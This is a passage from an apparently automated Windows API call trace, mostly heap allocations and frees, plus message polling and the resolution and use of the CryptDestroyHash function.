hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0186.277] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0186.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0186.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0186.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc168 | out: hHeap=0x8a0000) returned 1 [0186.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0186.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0186.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0186.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0186.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0186.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0186.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0186.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0186.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.278] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0186.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0186.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0186.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0186.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0186.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0186.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0186.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0186.278] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0186.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.278] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0186.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0186.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90afd8 [0186.279] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90afd8 | out: hHeap=0x8a0000) returned 1 [0186.279] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0186.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0186.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0186.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.279] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0186.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0186.279] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0186.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0186.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d460 [0186.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0186.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0186.279] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0186.279] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9a90 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd8a0 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7e0 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fe8 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdaf8 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba000 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd738 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0186.280] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd828 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd870 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd630 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd510 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd540 [0186.280] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0186.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0186.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0186.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0186.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0186.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0186.281] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0186.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0186.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fa0 [0186.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0186.281] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0186.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0186.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2758 [0186.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0186.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0186.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0186.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0186.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0186.281] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.281] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0186.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0186.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0186.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0186.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0186.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0186.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0186.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2728 [0186.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2728 [0186.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0186.282] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0186.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0186.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0186.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0186.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0186.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0186.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0186.282] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.282] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0186.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0186.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0186.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0186.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0186.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0186.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0186.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0186.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0186.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0186.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x11) returned 0x90d460 [0186.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x90d460, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0186.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0186.283] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0186.283] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0186.283] GetProcAddress (hModule=0x74f20000, lpProcName="CryptDestroyHash") returned 0x74f2df66 [0186.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0186.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0186.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27f8 [0186.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0186.284] CryptDestroyHash (hHash=0x90ae18) returned 1 [0186.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0186.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0186.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0186.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0186.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0186.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0186.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0186.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0186.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0186.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0186.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0186.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0186.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0186.284] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0186.284] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2758 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0186.285] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0186.286] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0186.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0186.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0186.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0186.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0186.286] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.286] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0186.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0186.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0186.287] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27f8 [0186.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0186.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0186.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0186.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0186.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dead8 | out: hHeap=0x8a0000) returned 1 [0186.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0186.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0186.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0186.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0186.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0186.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0186.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0186.287] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, 